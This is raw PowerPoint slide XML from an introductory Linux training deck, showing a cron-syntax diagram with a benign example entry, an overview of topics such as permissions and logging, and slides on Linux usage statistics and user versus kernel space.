            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*    *   *   *  *  root   /scripts/script.sh</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bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6181333" y="3747392"/>
            <a:ext cx="1152395" cy="2465517"/>
            <a:chOff x="6143648" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6200384" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6143648" y="5711870"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7352778" y="6052724"/>
            <a:ext cx="1503124" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Minute (0 - 59)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991606" y="5647447"/>
            <a:ext cx="1503124" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hour (0 - 23)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8513819" y="5248637"/>
            <a:ext cx="1899085" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Day of month (1 - 31)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9711497" y="4849827"/>
            <a:ext cx="1503124" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Month (1 - 12)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9684854" y="4177399"/>
            <a:ext cx="2229633" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Day of week (0 - 7) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0 / 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Sunday</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9678240" y="3778589"/>
            <a:ext cx="2229633" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command to execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6487656" y="3731871"/>
            <a:ext cx="1494425" cy="2111440"/>
            <a:chOff x="6178509" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Connector 32"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6200384" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6178509" y="5711869"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6765404" y="3747392"/>
            <a:ext cx="1736247" cy="1690641"/>
            <a:chOff x="6162726" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Connector 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6200384" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Arrow Connector 36"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6162726" y="5700661"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7017385" y="3747393"/>
            <a:ext cx="2674236" cy="1330800"/>
            <a:chOff x="6163712" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="Straight Connector 38"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6200384" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6163712" y="5711870"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7215505" y="3747392"/>
            <a:ext cx="2440774" cy="747127"/>
            <a:chOff x="6160202" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6200384" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6160202" y="5686504"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Group 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8242300" y="3777421"/>
            <a:ext cx="1404454" cy="168091"/>
            <a:chOff x="6107276" y="3747393"/>
            <a:chExt cx="3432132" cy="1989528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="Straight Connector 44"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6177106" y="3747393"/>
              <a:ext cx="0" cy="1989528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="46" name="Straight Arrow Connector 45"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6107276" y="5711864"/>
              <a:ext cx="3432132" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855697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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324551261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Linux is one of the most powerful operating systems (OS) and it powers global technology across the globe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Majority of the world’s supercomputers run on Linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>23 of the 25 top websites in the world use Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>96.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of world’s top 1M servers run on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of all cloud infrastructure operates on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>85</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of all smartphones are Linux-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux has presence in Air Force environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25608" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>So What?</a:t>
            </a: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182880" y="1611630"/>
            <a:ext cx="11807190" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="2806922"/>
            <a:ext cx="11807190" cy="309590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00EAB2"/>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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User and Kernel Space</a:t>
